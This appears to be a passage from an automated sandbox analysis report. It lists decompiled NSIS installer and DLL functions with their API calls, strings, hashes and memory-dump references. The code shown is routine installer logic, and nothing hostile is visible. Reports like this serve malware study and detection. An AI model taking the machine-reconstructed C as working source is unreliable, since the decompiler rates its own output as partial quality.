                                                                                                                                                    • Opcode Fuzzy Hash: cbb037369a89222beb8e0764b6580340074a8a000d66e15c3e77f1daa8de98e1
                                                                                                                                                    • Instruction Fuzzy Hash: 36116DB190024ADFCB44CFD9D910BBEB7B9FB46724F21463AE416AB380DB385504DB96
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00401EB9, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 52%
                                                                                                                                                    			E00401EB9(void* __ebx) {
				void* _t9;
				void _t12;
				void* _t14;
				void* _t22;
				void* _t24;
				void* _t26;
				void* _t27;
				void* _t29;

				_t24 =  *0x40c0e0; // 0x0
				if( *((intOrPtr*)(_t29 - 0x24)) == __ebx) {
					if(_t22 == __ebx) {
						_t9 = GlobalAlloc(0x40, 0x400c); // executed
						_t27 = _t9;
						_t6 = _t27 + 4; // 0x4
						E00406831(__ebx, _t24, _t27, _t6,  *((intOrPtr*)(_t29 - 0x2c)));
						_t12 =  *0x40c0e0; // 0x0
						 *_t27 = _t12;
						 *0x40c0e0 = _t27;
					} else {
						if(_t24 != __ebx) {
							_t4 = _t24 + 4; // 0x4
							E00406035(_t26, _t4);
							 *0x40c0e0 =  *_t24;
							_push(_t24);
							GlobalFree(); // executed
						} else {
							_push(L"Pop: stack empty");
							E004062CF();
							 *((intOrPtr*)(_t29 - 4)) = 1;
						}
					}
					goto L17;
				} else {
					while(1) {
						__eax = __eax - 1;
						if(__edi == __ebx) {
							break;
						}
						__edi =  *__edi;
						if(__eax != __ebx) {
							continue;
						} else {
							if(__edi != __ebx) {
								__edi = __edi + 4;
								__esi = L"install";
								__eax = E00406035(__esi, __edi);
								__eax =  *0x40c0e0; // 0x0
								__eax = E00406035(__edi, __eax);
								__eax =  *0x40c0e0; // 0x0
								_push(__esi);
								_push(__eax);
								__eax = E00406035();
								L17:
								 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t29 - 4));
								_t14 = 0;
							} else {
								break;
							}
						}
						goto L19;
					}
					__eax = E004062CF(L"Exch: stack < %d elements",  *((intOrPtr*)(__ebp - 0x24)));
					_push(0x200010);
					_push(E00406831(__ebx, __edi, __esi, __ebx, 0xffffffe8));
					__eax = E00405CCC();
					_t14 = 0x7fffffff;
				}
				L19:
				return _t14;
			}











                                                                                                                                                    0x00401ebc
                                                                                                                                                    0x00401ec4
                                                                                                                                                    0x00401f26
                                                                                                                                                    0x00401f5a
                                                                                                                                                    0x00401f63
                                                                                                                                                    0x00401f65
                                                                                                                                                    0x00401f69
                                                                                                                                                    0x00401f6e
                                                                                                                                                    0x00401f73
                                                                                                                                                    0x00401f75
                                                                                                                                                    0x00401f28
                                                                                                                                                    0x00401f2a
                                                                                                                                                    0x00401f3c
                                                                                                                                                    0x00401f41
                                                                                                                                                    0x00401f48
                                                                                                                                                    0x00401f4d
                                                                                                                                                    0x00402387
                                                                                                                                                    0x00401f2c
                                                                                                                                                    0x00401f2c
                                                                                                                                                    0x00401f31
                                                                                                                                                    0x00401a13
                                                                                                                                                    0x00401a13
                                                                                                                                                    0x00401f2a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401ec6
                                                                                                                                                    0x00401ec6
                                                                                                                                                    0x00401ec6
                                                                                                                                                    0x00401ec9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401ecb
                                                                                                                                                    0x00401ecf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401ed1
                                                                                                                                                    0x00401ed3
                                                                                                                                                    0x00401ef7
                                                                                                                                                    0x00401efb
                                                                                                                                                    0x00401f01
                                                                                                                                                    0x00401f06
                                                                                                                                                    0x00401f10
                                                                                                                                                    0x00401f15
                                                                                                                                                    0x00401f1a
                                                                                                                                                    0x00401f1e
                                                                                                                                                    0x00402e4b
                                                                                                                                                    0x004030e3
                                                                                                                                                    0x004030e6
                                                                                                                                                    0x004030ec
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401ed3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401ecf
                                                                                                                                                    0x00401edd
                                                                                                                                                    0x00401ee4
                                                                                                                                                    0x00401ef1
                                                                                                                                                    0x00401c3c
                                                                                                                                                    0x00401632
                                                                                                                                                    0x00401632
                                                                                                                                                    0x004030ee
                                                                                                                                                    0x004030f2

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                    • GlobalFree.KERNEL32 ref: 00402387
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeGloballstrcpyn
                                                                                                                                                    • String ID: Exch: stack < %d elements$Pop: stack empty$install
                                                                                                                                                    • API String ID: 1459762280-2295550231
                                                                                                                                                    • Opcode ID: e59d48cc0b33387c2730e4ad274f001f3a7594b7c65e82bccf9c8afdadd6d069
                                                                                                                                                    • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                    • Opcode Fuzzy Hash: e59d48cc0b33387c2730e4ad274f001f3a7594b7c65e82bccf9c8afdadd6d069
                                                                                                                                                    • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004022FD, Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                    			E004022FD(int __ebx, short* __edi, short* __esi) {
				short* _t18;
				long _t19;
				void* _t22;
				void* _t36;
				void* _t41;

				_t18 = E0040145C(_t36, 0xffffffee);
				 *(_t41 - 0x44) = _t18;
				_t19 = GetFileVersionInfoSizeW(_t18, _t41 - 0x14);
				 *__esi = 0;
				 *(_t41 - 0x10) = _t19;
				 *__edi = 0;
				 *((intOrPtr*)(_t41 - 4)) = 1;
				if(_t19 != __ebx) {
					_t22 = GlobalAlloc(0x40, _t19);
					 *(_t41 + 8) = _t22;
					if(_t22 != __ebx) {
						if(GetFileVersionInfoW( *(_t41 - 0x44), __ebx,  *(_t41 - 0x10), _t22) != 0 && VerQueryValueW( *(_t41 + 8), "\\", _t41 - 8, _t41 - 0x44) != 0) {
							E00405F7D(__esi,  *((intOrPtr*)( *(_t41 - 8) + 8)));
							E00405F7D(__edi,  *((intOrPtr*)( *(_t41 - 8) + 0xc)));
							 *((intOrPtr*)(_t41 - 4)) = __ebx;
						}
						_push( *(_t41 + 8));
						GlobalFree(); // executed
					}
				}
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t41 - 4));
				return 0;
			}








                                                                                                                                                    0x004022ff
                                                                                                                                                    0x00402309
                                                                                                                                                    0x0040230c
                                                                                                                                                    0x00402313
                                                                                                                                                    0x00402316
                                                                                                                                                    0x00402319
                                                                                                                                                    0x0040231c
                                                                                                                                                    0x00402325
                                                                                                                                                    0x0040232e
                                                                                                                                                    0x00402334
                                                                                                                                                    0x00402339
                                                                                                                                                    0x0040234e
                                                                                                                                                    0x00402370
                                                                                                                                                    0x0040237c
                                                                                                                                                    0x00402381
                                                                                                                                                    0x00402381
                                                                                                                                                    0x00402384
                                                                                                                                                    0x00402387
                                                                                                                                                    0x00402387
                                                                                                                                                    0x00402339
                                                                                                                                                    0x004030e6
                                                                                                                                                    0x004030f2

                                                                                                                                                    APIs
                                                                                                                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                    • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                    • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                    • GlobalFree.KERNEL32 ref: 00402387
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3376005127-0
                                                                                                                                                    • Opcode ID: 62822491a2171e7313e749cd3bc434bc25a9f92e131eb6a230f292f9eb063890
                                                                                                                                                    • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                    • Opcode Fuzzy Hash: 62822491a2171e7313e749cd3bc434bc25a9f92e131eb6a230f292f9eb063890
                                                                                                                                                    • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00402B23, Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                    			E00402B23(int __ebx, intOrPtr* __esi) {
				long _t14;
				struct _OVERLAPPED* _t20;
				void* _t23;
				intOrPtr* _t26;
				void* _t28;

				_t26 = __esi;
				_t20 = __ebx;
				 *(_t28 + 8) = GlobalAlloc(0x40, 0x2004);
				if( *((intOrPtr*)(_t28 - 0x24)) == __ebx) {
					E0040145C(_t23, 0x11);
					WideCharToMultiByte(__ebx, __ebx, 0x4100f0, 0xffffffff,  *(_t28 + 8), 0x2004, __ebx, __ebx);
					_t14 = lstrlenA( *(_t28 + 8));
				} else {
					__ecx = 0;
					__ecx = 1;
					E00401446(1);
					__ecx =  *((intOrPtr*)(__ebp + 8));
					 *__ecx = __al;
				}
				if( *_t26 == _t20 || WriteFile(E00405F96(_t28 - 0x44, _t26),  *(_t28 + 8), _t14, _t28 - 0x44, _t20) == 0) {
					 *((intOrPtr*)(_t28 - 4)) = 1;
				}
				_push( *(_t28 + 8));
				GlobalFree(); // executed
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}








                                                                                                                                                    0x00402b23
                                                                                                                                                    0x00402b23
                                                                                                                                                    0x00402b31
                                                                                                                                                    0x00402b37
                                                                                                                                                    0x00402b4d
                                                                                                                                                    0x00402b61
                                                                                                                                                    0x00402b6a
                                                                                                                                                    0x00402b39
                                                                                                                                                    0x00402b39
                                                                                                                                                    0x00402b3b
                                                                                                                                                    0x00402b3c
                                                                                                                                                    0x00402b41
                                                                                                                                                    0x00402b44
                                                                                                                                                    0x00402b48
                                                                                                                                                    0x00402b73
                                                                                                                                                    0x00402b93
                                                                                                                                                    0x00402b93
                                                                                                                                                    0x00402384
                                                                                                                                                    0x00402387
                                                                                                                                                    0x004030e6
                                                                                                                                                    0x004030f2

                                                                                                                                                    APIs
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2568930968-0
                                                                                                                                                    • Opcode ID: 39b3758b80fcd953e19c2f81128d57e0ae640eda6b6d66c2b66b0c237e413b24
                                                                                                                                                    • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                    • Opcode Fuzzy Hash: 39b3758b80fcd953e19c2f81128d57e0ae640eda6b6d66c2b66b0c237e413b24
                                                                                                                                                    • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E65A56B, Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • TlsFree.KERNELBASE(?,3920FDCC,?,?,?,6E6820C0,000000FF), ref: 6E65A5B2
                                                                                                                                                    • GlobalHandle.KERNEL32(00000000), ref: 6E65A5C1
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,6E6820C0,000000FF), ref: 6E65A5CA
                                                                                                                                                    • GlobalFree.KERNEL32 ref: 6E65A5D1
                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,3920FDCC,?,?,?,6E6820C0,000000FF), ref: 6E65A5DB
                                                                                                                                                      • Part of subcall function 6E65A838: EnterCriticalSection.KERNEL32(0000001C,00000000,00000004,0000001C), ref: 6E65A8B3
                                                                                                                                                      • Part of subcall function 6E65A838: LeaveCriticalSection.KERNEL32(0000001C,?), ref: 6E65A8C6
                                                                                                                                                      • Part of subcall function 6E65A838: LocalFree.KERNEL32(00000000), ref: 6E65A8CF
                                                                                                                                                      • Part of subcall function 6E65A838: TlsSetValue.KERNEL32(?,00000000), ref: 6E65A8EB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1549993015-0
                                                                                                                                                    • Opcode ID: e4c3a9539725fe2b0980f054d0c5731a9b0ce3b4be7f6af002fa426696dcc57f
                                                                                                                                                    • Instruction ID: 871fc4b43c0be7d3f29071fc1b531a21f4f0fc878d982b185cf94c8e7bde07b5
                                                                                                                                                    • Opcode Fuzzy Hash: e4c3a9539725fe2b0980f054d0c5731a9b0ce3b4be7f6af002fa426696dcc57f
                                                                                                                                                    • Instruction Fuzzy Hash: B7019231640A06FFCB118FA5C808F5ABBB9FB46721F000325E822D3790DB34A911CBB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E64F9F0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E628FF0: _DebugHeapAllocator.LIBCPMTD ref: 6E629045
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E64FA2D
                                                                                                                                                      • Part of subcall function 6E628FD0: _DebugHeapAllocator.LIBCPMTD ref: 6E628FDE
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap$Base::Concurrency::details::ContextIdentityQueueWork
                                                                                                                                                    • String ID: in_
                                                                                                                                                    • API String ID: 1698587239-3102548977
                                                                                                                                                    • Opcode ID: 52a910f437341307ce508eb82cc199595c80c5e3ea3cec8e5599d6c5a255b3f5
                                                                                                                                                    • Instruction ID: 7715eb24173d462a31f5586ebf00f25d38435df255b305883c4b1e353e2fce13
                                                                                                                                                    • Opcode Fuzzy Hash: 52a910f437341307ce508eb82cc199595c80c5e3ea3cec8e5599d6c5a255b3f5
                                                                                                                                                    • Instruction Fuzzy Hash: 07414A70940206EFCB44DFE1C950BFE77B9BB46318F20962AE815662D0DB745584CFAA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E648BD0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: task
                                                                                                                                                    • String ID: H'in$type must be number, but is
                                                                                                                                                    • API String ID: 1384045349-909858233
                                                                                                                                                    • Opcode ID: e933d130f75fa5d60f626e06f464055e12029f1f6e45ffd5a39a856df85dd1cb
                                                                                                                                                    • Instruction ID: e2a308f76e0ba0591d3855cc3009d50a29046ee847d10aca64d2a40eed3c197f
                                                                                                                                                    • Opcode Fuzzy Hash: e933d130f75fa5d60f626e06f464055e12029f1f6e45ffd5a39a856df85dd1cb
                                                                                                                                                    • Instruction Fuzzy Hash: C7418174904648EFCB04CFE8C950AEEBBB5FF59318F108569E8166B390DB30AA05CF94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E673823, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32(?,8007000E,?,6E665559,6E67399B,?,?,6E650862,8007000E,?,?,?,6E62DCAC,8007000E,?,6E6508EC), ref: 6E673828
                                                                                                                                                    • _free.LIBCMT ref: 6E673885
                                                                                                                                                    • _free.LIBCMT ref: 6E6738BB
                                                                                                                                                    • SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,8007000E,?,6E665559,6E67399B,?,?,6E650862,8007000E,?,?,?,6E62DCAC), ref: 6E6738C6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2283115069-0
                                                                                                                                                    • Opcode ID: aa63755e013570eb8802d047fbb656d4a48d15e2b313794a0c88a660ec0640aa
                                                                                                                                                    • Instruction ID: 16982a1e5365786b8e1e832202b567d1fbce720700697d1e9c5409e9099b3248
                                                                                                                                                    • Opcode Fuzzy Hash: aa63755e013570eb8802d047fbb656d4a48d15e2b313794a0c88a660ec0640aa
                                                                                                                                                    • Instruction Fuzzy Hash: 4111A9326D49066ADF611EF74C8CEAE276DABC7779B200734F124D62D4EF758C068129
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E671773, Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateThread.KERNELBASE ref: 6E6717C2
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,6E64FBDD,6E64F5F0), ref: 6E6717CE
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 6E6717D5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2744730728-0
                                                                                                                                                    • Opcode ID: e4734540f240efe4ee87251b3e0b94a90a59756a9ac77d59e57d341b8fceb65b
                                                                                                                                                    • Instruction ID: 49640a615dbd7bb105336c6b9328ab5271e1bd5e289b7ddf9091734bfd6df2d1
                                                                                                                                                    • Opcode Fuzzy Hash: e4734540f240efe4ee87251b3e0b94a90a59756a9ac77d59e57d341b8fceb65b
                                                                                                                                                    • Instruction Fuzzy Hash: 1501A136510605BBCF208FE6C818BDE7FB9DF82379F20461AF5259A1D0DB7085099660
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00405EAB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00405EAB(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				void* _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_v12 = _t12;
					_t13 =  *0x40a660; // 0x61
					_t23 = _t23 - 1;
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 = _t17;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                                                                                                                    0x00405eb1
                                                                                                                                                    0x00405eb7
                                                                                                                                                    0x00405eb8
                                                                                                                                                    0x00405eb8
                                                                                                                                                    0x00405ebd
                                                                                                                                                    0x00405ec0
                                                                                                                                                    0x00405ec5
                                                                                                                                                    0x00405ec6
                                                                                                                                                    0x00405ec9
                                                                                                                                                    0x00405ed1
                                                                                                                                                    0x00405ee0
                                                                                                                                                    0x00405ee4
                                                                                                                                                    0x00405eec
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405ef0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405ef2
                                                                                                                                                    0x00405ef2
                                                                                                                                                    0x00405ef2
                                                                                                                                                    0x00405ef5
                                                                                                                                                    0x00405ef8
                                                                                                                                                    0x00405ef8
                                                                                                                                                    0x00405efb
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                                    • String ID: nsa
                                                                                                                                                    • API String ID: 1716503409-2209301699
                                                                                                                                                    • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                    • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                    • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                    • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E671BF4, Relevance: 4.9, APIs: 3, Instructions: 406COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
